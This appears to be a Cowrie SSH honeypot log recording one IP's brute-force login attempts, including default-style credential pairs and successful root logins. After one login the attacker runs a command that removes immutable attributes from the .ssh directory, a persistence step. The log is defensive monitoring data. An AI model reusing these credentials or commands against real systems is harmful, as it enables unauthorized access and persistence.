{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:10:02.658444Z","src_ip":"212.227.235.229","session":"ab39e484ae2e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T10:10:03.787212Z","src_ip":"212.227.235.229","session":"ab39e484ae2e"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:10:05.077252Z","src_ip":"212.227.235.229","session":"ab39e484ae2e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52028,"dst_ip":"1.2.3.4","dst_port":22,"session":"c26b2c2fa482","protocol":"ssh","message":"New connection: 212.227.235.229:52028 (1.2.3.4:22) [session: c26b2c2fa482]","sensor":"my-vps","timestamp":"2025-09-09T10:10:05.343123Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:10:05.344845Z","src_ip":"212.227.235.229","session":"c26b2c2fa482"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:10:05.617143Z","src_ip":"212.227.235.229","session":"c26b2c2fa482"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T10:10:06.706183Z","src_ip":"212.227.235.229","session":"c26b2c2fa482"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:10:06.984415Z","src_ip":"212.227.235.229","session":"c26b2c2fa482"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:10:06.988003Z","src_ip":"212.227.235.229","session":"b0fd73ecbcc7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54618,"dst_ip":"1.2.3.4","dst_port":22,"session":"22618802c1b2","protocol":"ssh","message":"New connection: 212.227.235.229:54618 (1.2.3.4:22) [session: 22618802c1b2]","sensor":"my-vps","timestamp":"2025-09-09T10:10:14.147249Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:10:14.151915Z","src_ip":"212.227.235.229","session":"22618802c1b2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:10:14.411799Z","src_ip":"212.227.235.229","session":"22618802c1b2"}
{"eventid":"cowrie.login.failed","username":"anonymous","password":"anonymous@2025","message":"login attempt [anonymous/anonymous@2025] failed","sensor":"my-vps","timestamp":"2025-09-09T10:10:15.500721Z","src_ip":"212.227.235.229","session":"22618802c1b2"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:10:16.763291Z","src_ip":"212.227.235.229","session":"22618802c1b2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35674,"dst_ip":"1.2.3.4","dst_port":22,"session":"c33603adbda1","protocol":"ssh","message":"New connection: 212.227.235.229:35674 (1.2.3.4:22) [session: c33603adbda1]","sensor":"my-vps","timestamp":"2025-09-09T10:10:24.989253Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:10:24.993577Z","src_ip":"212.227.235.229","session":"c33603adbda1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:10:25.095111Z","src_ip":"212.227.235.229","session":"c33603adbda1"}
{"eventid":"cowrie.login.failed","username":"openbravo","password":"openbravo","message":"login attempt [openbravo/openbravo] failed","sensor":"my-vps","timestamp":"2025-09-09T10:10:25.547436Z","src_ip":"212.227.235.229","session":"c33603adbda1"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:10:26.653361Z","src_ip":"212.227.235.229","session":"c33603adbda1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33746,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e46a337e9e1","protocol":"ssh","message":"New connection: 212.227.235.229:33746 (1.2.3.4:22) [session: 4e46a337e9e1]","sensor":"my-vps","timestamp":"2025-09-09T10:10:33.196053Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:10:33.200354Z","src_ip":"212.227.235.229","session":"4e46a337e9e1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:10:33.475399Z","src_ip":"212.227.235.229","session":"4e46a337e9e1"}
{"eventid":"cowrie.login.failed","username":"alex","password":"111111","message":"login attempt [alex/111111] failed","sensor":"my-vps","timestamp":"2025-09-09T10:10:34.596869Z","src_ip":"212.227.235.229","session":"4e46a337e9e1"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:10:35.863938Z","src_ip":"212.227.235.229","session":"4e46a337e9e1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43984,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d7b9a432245","protocol":"ssh","message":"New connection: 212.227.235.229:43984 (1.2.3.4:22) [session: 1d7b9a432245]","sensor":"my-vps","timestamp":"2025-09-09T10:11:07.953627Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:11:07.958168Z","src_ip":"212.227.235.229","session":"1d7b9a432245"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:11:08.218325Z","src_ip":"212.227.235.229","session":"1d7b9a432245"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"zabbix2025","message":"login attempt [zabbix/zabbix2025] failed","sensor":"my-vps","timestamp":"2025-09-09T10:11:09.312211Z","src_ip":"212.227.235.229","session":"1d7b9a432245"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:11:10.572595Z","src_ip":"212.227.235.229","session":"1d7b9a432245"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35688,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ed4afb93859","protocol":"ssh","message":"New connection: 212.227.235.229:35688 (1.2.3.4:22) [session: 2ed4afb93859]","sensor":"my-vps","timestamp":"2025-09-09T10:11:28.546163Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:11:28.551043Z","src_ip":"212.227.235.229","session":"2ed4afb93859"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:11:28.653692Z","src_ip":"212.227.235.229","session":"2ed4afb93859"}
{"eventid":"cowrie.login.failed","username":"muhamad","password":"Password123","message":"login attempt [muhamad/Password123] failed","sensor":"my-vps","timestamp":"2025-09-09T10:11:29.103332Z","src_ip":"212.227.235.229","session":"2ed4afb93859"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:11:30.204677Z","src_ip":"212.227.235.229","session":"2ed4afb93859"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53178,"dst_ip":"1.2.3.4","dst_port":22,"session":"47d96f6fc8c9","protocol":"ssh","message":"New connection: 212.227.235.229:53178 (1.2.3.4:22) [session: 47d96f6fc8c9]","sensor":"my-vps","timestamp":"2025-09-09T10:11:42.493495Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:11:42.499590Z","src_ip":"212.227.235.229","session":"47d96f6fc8c9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:11:42.764221Z","src_ip":"212.227.235.229","session":"47d96f6fc8c9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54222,"dst_ip":"1.2.3.4","dst_port":22,"session":"412600dcb519","protocol":"ssh","message":"New connection: 212.227.235.229:54222 (1.2.3.4:22) [session: 412600dcb519]","sensor":"my-vps","timestamp":"2025-09-09T10:11:43.576279Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:11:43.579648Z","src_ip":"212.227.235.229","session":"412600dcb519"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:11:43.845731Z","src_ip":"212.227.235.229","session":"412600dcb519"}
{"eventid":"cowrie.login.failed","username":"fish","password":"111","message":"login attempt [fish/111] failed","sensor":"my-vps","timestamp":"2025-09-09T10:11:43.849239Z","src_ip":"212.227.235.229","session":"47d96f6fc8c9"}
{"eventid":"cowrie.login.failed","username":"suraj","password":"1234","message":"login attempt [suraj/1234] failed","sensor":"my-vps","timestamp":"2025-09-09T10:11:44.935694Z","src_ip":"212.227.235.229","session":"412600dcb519"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:11:45.114226Z","src_ip":"212.227.235.229","session":"47d96f6fc8c9"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:11:46.499067Z","src_ip":"212.227.235.229","session":"412600dcb519"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36240,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ee0bab7f48e","protocol":"ssh","message":"New connection: 212.227.235.229:36240 (1.2.3.4:22) [session: 7ee0bab7f48e]","sensor":"my-vps","timestamp":"2025-09-09T10:12:20.981423Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:12:20.986512Z","src_ip":"212.227.235.229","session":"7ee0bab7f48e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:12:21.232737Z","src_ip":"212.227.235.229","session":"7ee0bab7f48e"}
{"eventid":"cowrie.login.success","username":"root","password":"qwe123..","message":"login attempt [root/qwe123..] succeeded","sensor":"my-vps","timestamp":"2025-09-09T10:12:22.280549Z","src_ip":"212.227.235.229","session":"7ee0bab7f48e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T10:12:22.861360Z","src_ip":"212.227.235.229","session":"7ee0bab7f48e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T10:12:22.864056Z","src_ip":"212.227.235.229","session":"7ee0bab7f48e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T10:12:22.866560Z","src_ip":"212.227.235.229","session":"7ee0bab7f48e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:12:23.117967Z","src_ip":"212.227.235.229","session":"7ee0bab7f48e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T10:12:23.630083Z","src_ip":"212.227.235.229","session":"7ee0bab7f48e"}
